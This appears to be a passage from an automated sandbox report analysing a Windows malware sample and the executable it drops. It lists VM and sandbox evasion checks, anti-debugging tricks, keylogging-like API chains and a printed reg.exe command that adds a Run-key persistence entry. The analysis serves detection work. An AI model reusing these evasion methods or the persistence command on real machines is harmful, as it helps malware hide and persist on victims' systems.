                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03336358 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_03336358
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: DAPIjX8.exe, 00000009.00000002.3244941197.00000000008B4000.00000020.00000001.01000000.0000000A.sdmp, DAPIjX8.exe, 0000000A.00000002.2726212590.00000000008B4000.00000020.00000001.01000000.0000000A.sdmp, DAPIjX8.exe, 0000000B.00000002.2806309730.00000000008B4000.00000020.00000001.01000000.0000000A.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeRDTSC instruction interceptor: First address: BC92C8 second address: BC92CF instructions: 0x00000000 rdtsc 0x00000002 xor cl, FFFFFF9Ah 0x00000005 mov eax, ebp 0x00000007 rdtsc
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeRDTSC instruction interceptor: First address: BF0B47 second address: 102AF4A instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 movzx eax, di 0x00000006 pop eax 0x00000007 cwd 0x00000009 jmp 00007F3EF8FFD667h 0x0000000e pop esi 0x0000000f movzx edx, cx 0x00000012 jmp 00007F3EF8DAB8A8h 0x00000017 pop ebx 0x00000018 xchg dh, dl 0x0000001a movsx edx, di 0x0000001d pop edx 0x0000001e jmp 00007F3EF8E54A5Ah 0x00000023 ret 0x00000024 popfd 0x00000025 rdtsc
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeRDTSC instruction interceptor: First address: 9BEAAF second address: 9BEAB3 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 pop edi 0x00000004 rdtsc
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeRDTSC instruction interceptor: First address: 9BEAB3 second address: 8F4D48 instructions: 0x00000000 rdtsc 0x00000002 mov ebp, 3E4A5909h 0x00000007 pop ebp 0x00000008 xchg bh, bl 0x0000000a jmp 00007F3EF8DF972Ah 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSpecial instruction interceptor: First address: 102AF4A instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeDropped PE file which has not been started: C:\Program Files (x86)\6fjdie\VCRUNTIME140.dllJump to dropped file
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeDropped PE file which has not been started: C:\Program Files (x86)\6fjdie\MSVCP140.dllJump to dropped file
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-42228
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeAPI coverage: 7.0 %
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeAPI coverage: 2.0 %
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeAPI coverage: 1.0 %
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exe TID: 7628Thread sleep time: -93000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exe TID: 1196Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exe TID: 1196Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C65270F GetLocalTime followed by cmp: cmp eax, 0ch and CTI: jle 6C652771h9_2_6C65270F
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C65270F GetLocalTime followed by cmp: cmp eax, 0ch and CTI: jle 6C652771h10_2_6C65270F
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0332A374 lstrcpy,lstrcat,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcat,lstrcat,lstrcpy,lstrcat,lstrcat,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,_strstr,_strstr,CreateFileA,CreatePipe,CreateProcessA,_strstr,_strstr,__alldvrm,SetFilePointer,ReadFile,CreatePipe,CreateProcessA,ReadFile,ReadFile,_strstr,_strstr,__alldvrm,SetFilePointer,ReadFile,FindNextFileA,std::ios_base::_Ios_base_dtor,9_2_0332A374
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033263C4 FindFirstFileA,FindClose,RemoveDirectoryA,Sleep,CreateFileA,GetFileSize,CreateFileA,GetFileSize,SetFilePointer,ReadFile,LocalAlloc,LocalFree,CloseHandle,Sleep,9_2_033263C4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03321134 lstrcpy,FindFirstFileA,lstrcpy,_strstr,LocalAlloc,LocalReAlloc,LocalSize,Sleep,LocalFree,FindNextFileA,FindClose,9_2_03321134
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0332A194 lstrcpy,CreateDirectoryA,FindFirstFileA,lstrcpy,lstrcpy,CreateDirectoryA,CopyFileA,FindNextFileA,9_2_0332A194
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033210BD lstrcpy,FindFirstFileA,lstrcpy,FindNextFileA,FindClose,9_2_033210BD
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033210DA lstrcpy,FindFirstFileA,lstrcpy,FindNextFileA,FindClose,9_2_033210DA
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03322754 FindFirstFileA,FindClose,CreateFileA,Sleep,CreateFileA,CloseHandle,GetLastError,wsprintfA,9_2_03322754
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033224F4 lstrlen,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,9_2_033224F4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033314C4 RegOpenKeyExA,RegCloseKey,GetTickCount,gethostname,GetUserNameA,GetLastError,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,lstrcpy,lstrlen,OpenSCManagerA,wsprintfA,OpenServiceA,QueryServiceStatus,wsprintfA,lstrlen,GetModuleFileNameA,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,EnumDisplaySettingsA,_strftime,OpenSCManagerA,QueryServiceStatus,OpenSCManagerA,QueryServiceStatus,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,9_2_033314C4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03353AFC FindFirstFileExW,9_2_03353AFC
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03321AD4 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,9_2_03321AD4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03321E14 FindFirstFileA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,9_2_03321E14
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03320EB3 FindFirstFileA,FindClose,FindClose,9_2_03320EB3
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03321CE4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,RemoveDirectoryA,9_2_03321CE4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100230CD lstrcpy,FindFirstFileA,lstrcpy,FindNextFileA,FindClose,9_2_100230CD
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10023110 lstrcpy,FindFirstFileA,lstrcpy,_strstr,LocalAlloc,LocalReAlloc,LocalSize,Sleep,LocalFree,FindNextFileA,FindClose,9_2_10023110
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1002C170 lstrcpy,CreateDirectoryA,FindFirstFileA,lstrcpy,lstrcpy,CreateDirectoryA,CopyFileA,FindNextFileA,9_2_1002C170
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1002C350 lstrcpy,lstrcat,CreateDirectoryA,GetLastError,FindFirstFileA,lstrcpy,lstrcat,lstrcat,lstrcpy,lstrcat,lstrcat,lstrcmp,lstrcmp,CreateDirectoryA,GetLastError,CopyFileA,_strstr,_strstr,CreateFileA,CreatePipe,CreateProcessA,_strstr,_strstr,__alldvrm,SetFilePointer,ReadFile,CreatePipe,CreateProcessA,ReadFile,ReadFile,_strstr,_strstr,__alldvrm,SetFilePointer,ReadFile,FindNextFileA,std::ios_base::_Ios_base_dtor,9_2_1002C350
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100283A0 FindFirstFileA,FindClose,RemoveDirectoryA,Sleep,CreateFileA,GetFileSize,CreateFileA,GetFileSize,SetFilePointer,ReadFile,LocalAlloc,LocalFree,CloseHandle,Sleep,9_2_100283A0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100334A0 RegOpenKeyExA,RegCloseKey,GetTickCount,gethostname,GetUserNameA,GetLastError,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,lstrcpy,lstrlen,OpenSCManagerA,wsprintfA,OpenServiceA,QueryServiceStatus,wsprintfA,lstrlen,GetModuleFileNameA,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,EnumDisplaySettingsA,_strftime,OpenSCManagerA,QueryServiceStatus,OpenSCManagerA,QueryServiceStatus,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,9_2_100334A0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100244D0 lstrlen,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,9_2_100244D0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10024730 FindFirstFileA,FindClose,CreateFileA,Sleep,CreateFileA,CloseHandle,GetLastError,wsprintfA,9_2_10024730
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10023AB0 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,9_2_10023AB0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10055AD8 FindFirstFileExW,9_2_10055AD8
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10023CC0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,RemoveDirectoryA,9_2_10023CC0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10023DF0 FindFirstFileA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,9_2_10023DF0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03325404 GetLogicalDriveStringsA,QueryDosDeviceA,lstrlen,lstrcpy,lstrcpy,lstrcat,9_2_03325404
                Source: pXm5oVO3Go.exe, 00000000.00000002.2608012130.000000000086E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                Source: pXm5oVO3Go.exe, 00000000.00000002.2608012130.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, pXm5oVO3Go.exe, 00000000.00000002.2608012130.0000000000848000.00000004.00000020.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3245993542.000000000151E000.00000004.00000020.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3245993542.0000000001579000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: pXm5oVO3Go.exe, 00000000.00000002.2608012130.000000000086E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.0000000001579000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeAPI call chain: ExitProcess graph end nodegraph_0-42658
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeAPI call chain: ExitProcess graph end nodegraph_0-41987
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeAPI call chain: ExitProcess graph end nodegraph_9-145171
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeAPI call chain: ExitProcess graph end nodegraph_9-144272
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeAPI call chain: ExitProcess graph end node
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_0-42253
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeSystem information queried: KernelDebuggerInformationJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeProcess queried: DebugPortJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeProcess queried: DebugObjectHandleJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeProcess queried: DebugPortJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeProcess queried: DebugObjectHandleJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeProcess queried: DebugPortJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeProcess queried: DebugObjectHandleJump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_032FE051 GetNativeSystemInfo,VirtualAlloc,LoadLibraryA,LdrGetProcedureAddress,Sleep,9_2_032FE051
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03324334 EnumDisplaySettingsA,SystemParametersInfoA,PostMessageA,SystemParametersInfoA,PostMessageA,BlockInput,9_2_03324334
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_006388F0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_006388F0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03317F74 GetProcessHeap,RtlAllocateHeap,VirtualAlloc,VirtualAlloc,VirtualFree,VirtualProtect,GetLastError,FormatMessageW,LocalAlloc,OutputDebugStringA,9_2_03317F74
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_006554E8 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_006554E8
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_03640B11 mov eax, dword ptr fs:[00000030h]0_2_03640B11
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03351211 mov eax, dword ptr fs:[00000030h]9_2_03351211
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_032FEB31 mov eax, dword ptr fs:[00000030h]9_2_032FEB31
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0334989E mov eax, dword ptr fs:[00000030h]9_2_0334989E
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100531ED mov eax, dword ptr fs:[00000030h]9_2_100531ED
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1004B87A mov eax, dword ptr fs:[00000030h]9_2_1004B87A
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6D2D37 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,9_2_6C6D2D37
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_0040EB30 SetUnhandledExceptionFilter,GetClassInfoW,InitCommonControlsEx,GdiplusStartup,0_2_0040EB30
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_006388F0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_006388F0
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_00646E4E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00646E4E
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_0364AD45 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0364AD45
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_0364DC2A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0364DC2A
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_1000DC26 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_1000DC26
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_1000AD41 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_1000AD41
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6B1F6A _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_6C6B1F6A
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6B6D68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_6C6B6D68
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_6C6B1F75 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_6C6B1F75
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0333F32D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0333F32D
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033379B3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_033379B3
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0333798B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0333798B
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03336C46 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_03336C46
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10041309 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_10041309
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_1003998F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003998F
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_10038C22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10038C22
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6B6D68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6C6B6D68
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6B1F6A _malloc,std::exception::exception,std::exception::exception,__CxxThrowException@8,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_6C6B1F6A
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 10_2_6C6B1F75 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_6C6B1F75
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_0332456C keybd_event,9_2_0332456C
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeProcess created: C:\Program Files (x86)\6fjdie\DAPIjX8.exe "C:\Program Files (x86)\6fjdie\DAPIjX8.exe" Jump to behavior
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_03326A54 Sleep,CreateMutexA,GetLastError,CloseHandle,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateFileMappingA,Sleep,GetForegroundWindow,GetWindowTextA,lstrlen,GetLocalTime,wsprintfA,GetAsyncKeyState,lstrcat,Sleep,ReleaseMutex,9_2_03326A54
                Source: pXm5oVO3Go.exe, 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, pXm5oVO3Go.exe, 00000000.00000002.2609602068.0000000010018000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: Pragma: no-cacheGET&AAAAAAAAAAAA$libcef.dll:\v4.0.30319%s%s\%slib%s%slalala123%text/0SafeMonClassSHELL_TrayWndShell_TrayWnd2.lnkreg.exeadd "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v demo /t REG_SZ /d ""file:///BkShadowWndClass1511617181920212223242526272829303132333435363738404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118120121122123124126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160invalid string positionstring too long
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.0000000001579000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: pXm5oVO3Go.exe, pXm5oVO3Go.exe, 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, pXm5oVO3Go.exe, 00000000.00000002.2609602068.0000000010018000.00000002.00001000.00020000.00000000.sdmp, DAPIjX8.exe, DAPIjX8.exe, 00000009.00000002.3246679220.00000000032FE000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.000000000151E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ","FocusWindow":"Program Manager","group_i
                Source: pXm5oVO3Go.exe, pXm5oVO3Go.exe, 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, pXm5oVO3Go.exe, 00000000.00000002.2609602068.0000000010018000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SHELL_TrayWnd
                Source: DAPIjX8.exe, 00000009.00000002.3246679220.00000000032FE000.00000040.00000020.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3247531468.0000000010064000.00000002.00001000.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3246471111.00000000031D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -no-remote -profile iexplore.exeTaskbarGlomLevelSoftware\Microsoft\Windows\CurrentVersion\Explorer\Advancedexplorer.exeShell_TrayWnd\rundll32.exe shell32.dll,#61\Microsoft\Edge\msedge.exe\360Chrome\Chrome\secoresdk\\360se6\Application\360se.exe360se6\\Application\360se.exe#32768ntdll.dllRtlCompressBufferRtlGetCompressionWorkSpaceSize%08lX%04lX%lu
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.000000000151E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ","FocusWindow":"Program Manager","group_i:p^
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_100397E8 cpuid 9_2_100397E8
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00658080
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: ____lc_handle_func,GetLocaleInfoW,0_2_0066F472
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_0065856F
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00658508
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_006585AB
